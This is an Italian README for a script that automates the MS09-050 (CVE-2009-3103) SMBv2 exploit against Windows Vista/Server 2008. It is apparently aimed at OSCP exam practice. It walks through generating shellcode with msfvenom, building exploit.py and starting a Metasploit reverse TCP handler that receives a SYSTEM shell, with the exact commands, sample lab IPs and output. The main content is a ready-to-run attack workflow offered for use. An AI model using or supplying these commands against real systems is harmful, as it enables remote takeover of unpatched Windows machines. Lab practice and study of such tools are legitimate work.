
Wrapper automatico di exploit per MS09-050 (CVE-2009-3103) che prende di mira SMBv2 su Windows Vista/Server 2008. Genera shellcode, costruisce l'exploit e crea un handler Metasploit per l'accesso alla shell SYSTEM.
Setup in una riga per lo sfruttamento di MS09-050 (CVE-2009-3103). Senza problemi, senza debug, funziona e basta.
La maggior parte degli script MS09-050 in circolazione richiedono l'iniezione manuale di shellcode, hanno problemi di temporizzazione con gli handler, o semplicemente non funzionano. Questo wrapper:
Realizzato per la preparazione OSCP dove il tempo conta.
msfvenommsfconsolepython2rpcclient (di solito preinstallato)./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
./ms09_050.sh 192.168.233.40 192.168.45.232 443
Output:
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
- exploit.py
- handler.rc
=== RUN ===
Terminal 1: msfconsole -q -r handler.rc
Terminal 2: python2 exploit.py 192.168.233.40
Terminal 1 - Avvia l'handler:
msfconsole -q -r handler.rc
Attendi: Started reverse TCP handler on ...
Terminal 2 - Esegui l'exploit:
python2 exploit.py 192.168.233.40
Controlla Terminal 1 per la tua shell.
windows/shell/reverse_tcp) - funziona in modo affidabile con lo stager in questo exploitExploit originale basato su MS09-050 PoC di ohnozzy.
MIT - Fai quello che vuoi, purché non sia male.